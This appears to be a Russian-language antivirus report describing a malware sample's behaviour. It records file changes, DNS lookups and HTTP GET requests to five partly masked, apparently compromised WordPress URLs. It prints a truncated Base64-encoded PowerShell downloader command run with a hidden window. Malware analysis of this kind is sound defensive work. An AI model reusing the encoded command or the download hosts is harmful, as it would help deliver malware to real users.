Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAEQAVwBXAFEAbwB0AGkAPQAnAFcATgBOAFgAWgBsAGYAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAUgBpAFQAWQBQAHIATwBUAE8AYABDAE8ATAAiACAAPQAgAC...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bqnf.exe
Удаляет следующие файлы
- %TEMP%\bqnf.exe
Подменяет следующие файлы
- %TEMP%\bqnf.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://we#######erpestcontrolpros.com/wp-admin/fw8by_cdvmy_f/
- http://me#####ousforensic.com/wp-includes/8a_a6p3k_4c3177/
- http://tr####ukhanh.com/wp-admin/hl5c_h_ah5t/
- http://sm####idscare.com/jwuor/jh2s_p61h_k8prfk/
- http://ua###rgs.com/wordpress/2l7s_xpy_mnpp6tjbi3/
UDP
- DNS ASK we#######erpestcontrolpros.com
- DNS ASK me#####ousforensic.com
- DNS ASK tr####ukhanh.com
- DNS ASK sm####idscare.com
- DNS ASK ua###rgs.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAEQAVwBXAFEAbwB0AGkAPQAnAFcATgBOAFgAWgBsAGYAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAUgBpAFQAWQBQAHIATwBUAE8AYABDAE8ATAAiACAAPQAgAC...' (со скрытым окном)
